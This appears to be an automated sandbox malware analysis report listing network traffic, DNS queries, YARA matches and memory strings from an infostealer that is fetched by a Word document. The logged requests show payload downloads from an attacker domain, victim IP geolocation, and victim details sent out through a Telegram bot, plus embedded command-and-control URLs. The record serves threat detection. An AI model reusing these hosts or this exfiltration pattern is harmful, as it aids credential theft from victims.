Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
Source: global traffic	TCP traffic: 104.21.52.88:443 -> 192.168.2.22:49168

Networking

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Yara match	File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /swagodi.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: meridianresourcellc.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /swagodi.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: meridianresourcellc.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FA22C98-7DA0-493A-91D1-4967A9EB7810}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /swagodi.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: meridianresourcellc.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /swagodi.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: meridianresourcellc.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: meridianresourcellc.top
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 21:45:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 21:45:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgX
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comX
